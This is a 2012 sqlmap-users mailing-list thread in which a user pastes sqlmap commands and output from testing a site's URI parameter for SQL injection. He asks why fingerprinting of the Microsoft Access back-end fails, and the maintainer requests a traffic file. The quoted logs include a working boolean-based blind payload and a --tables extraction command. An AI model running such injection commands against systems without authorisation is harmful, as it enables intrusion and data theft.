Re: [sqlmap-users] Could not detect MS database injection
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Could not detect MS database injection
|
From: Miroslav S. <mir...@gm...> - 2012-12-15 17:59:05
|
Please send me privatelly content of traffic file for such run (just append -t traffic.txt to a problematic run). Kind regards, Miroslav Stampar On Dec 15, 2012 5:10 PM, "Volker Nebelung" <vol...@rw...> wrote: > Hi, > > I am using sqlmap to scan a specific GET parameter of a target site. I > know there is a SQL injection in parameter 2: > > python sqlmap.py -u "http://example.net/de/de*/site" --batch > > sqlmap gives me the following result: > > > … > > [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be > injectable (possible DBMS: Microsoft Access) > > [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*' > > [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > > [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - > WHERE or HAVING clause' injectable > > [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS > could be Microsoft Access. Do you want to skip test payloads specific for > other DBMSes? [Y/n] Y > > [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' > > [16:36:29] [INFO] automatically extending ranges for UNION query > injection technique tests as there is at least one other potential > injection technique found > > [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' > is a false positive > > [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep > testing the others (if any)? [y/N] N > > sqlmap identified the following injection points with a total of 34 > HTTP(s) requests: > > --- > > Place: URI > > Parameter: #1* > > Type: boolean-based blind > > Title: AND boolean-based blind - WHERE or HAVING clause > > Payload: http://example.net:80/de/de' AND 9199=9199 AND > 'tyFW'='tyFW/site > > --- > > [16:37:11] [INFO] testing Microsoft Access > > [16:37:13] [INFO] confirming Microsoft Access > > [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access > > [16:37:14] [INFO] testing MySQL > > [16:37:16] [WARNING] the back-end DBMS is not MySQL > > [16:37:16] [INFO] testing Oracle > > [16:37:17] [WARNING] the back-end DBMS is not Oracle > > [16:37:17] [INFO] testing PostgreSQL > > [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL > > [16:37:18] [INFO] testing Microsoft SQL Server > > [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server > > [16:37:19] [INFO] testing SQLite > > [16:37:20] [WARNING] the back-end DBMS is not SQLite > > [16:37:20] [INFO] testing Firebird > > [16:37:21] [WARNING] the back-end DBMS is not Firebird > > [16:37:21] [INFO] testing SAP MaxDB > > [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB > > [16:37:22] [INFO] testing Sybase > > [16:37:23] [WARNING] the back-end DBMS is not Sybase > > [16:37:23] [INFO] testing IBM DB2 > > [16:37:24] [WARNING] the back-end DBMS is not IBM DB2 > > [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end > database management system, but from the HTML error page it was possible to > determinate that the back-end DBMS is Microsoft Access. Do not specify the > back-end DBMS manually, sqlmap will fingerprint the DBMS for you > > [16:37:24] [WARNING] HTTP error codes detected during testing: > > 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times > > > > [*] shutting down at 16:37:24 > > I am confused at this point: Is sqlmap thinking that the DBMS is MS Access > or not? > When I manually try following URL in my browser " > http://example.net/de/de'/site" I get a 500 HTML-page with output > "Microsoft JET Database Engine Error …" so I would say the DBMS is MS > Access. > When I now try to get for example all tables, then following happens: > > > python sqlmap.py -u "example.net/de/de*/site" --batch --tables > > > > sqlmap/1.0-dev-0664e72 - automatic SQL injection and database > takeover tool > > http://sqlmap.org > > > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility to > obey all applicable local, state and federal laws. Developers assume no > liability and are not responsible for any misuse or damage caused by this > program > > > > [*] starting at 16:38:02 > > > > [16:38:05] [INFO] custom injection marking character ('*') found in > option '-u'. Do you want to process it? [Y/n/q] Y > > [16:38:05] [INFO] testing connection to the target url > > sqlmap identified the following injection points with a total of 0 > HTTP(s) requests: > > --- > > Place: URI > > Parameter: #1* > > Type: boolean-based blind > > Title: AND boolean-based blind - WHERE or HAVING clause > > Payload: http://example.net:80/de/de' AND 9199=9199 AND > 'tyFW'='tyFW/site > > --- > > [16:38:07] [INFO] testing MySQL > > [16:38:08] [INFO] heuristics detected web page charset 'ascii' > > [16:38:08] [WARNING] the back-end DBMS is not MySQL > > [16:38:08] [INFO] testing Oracle > > [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2' > > [16:38:09] [WARNING] the back-end DBMS is not Oracle > > [16:38:09] [INFO] testing PostgreSQL > > [16:38:10] [WARNING] reflective value(s) found and filtering out > > [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL > > [16:38:10] [INFO] testing Microsoft SQL Server > > [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server > > [16:38:11] [INFO] testing SQLite > > [16:38:12] [WARNING] the back-end DBMS is not SQLite > > [16:38:12] [INFO] testing Microsoft Access > > [16:38:12] [INFO] confirming Microsoft Access > > [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access > > [16:38:13] [INFO] testing Firebird > > [16:38:14] [WARNING] the back-end DBMS is not Firebird > > [16:38:14] [INFO] testing SAP MaxDB > > [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB > > [16:38:15] [INFO] testing Sybase > > [16:38:16] [WARNING] the back-end DBMS is not Sybase > > [16:38:16] [INFO] testing IBM DB2 > > [16:38:17] [WARNING] the back-end DBMS is not IBM DB2 > > [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end > database management system. Support for this DBMS will be implemented at > some point > > [16:38:17] [WARNING] HTTP error codes detected during testing: > > 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times > > > > [*] shutting down at 16:38:17 > > Even when i try to use --text-only or --not-string switches I am not able > to receive the tables. Any ideas? > > > Best regards > > Volker Nebelung > > ------------------------------------------------------------------------------ > LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial > Remotely access PCs and mobile devices and provide instant support > Improve your efficiency, and focus on delivering more value-add services > Discover what IT Professionals Know. Rescue delivers > http://p.sf.net/sfu/logmein_12329d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
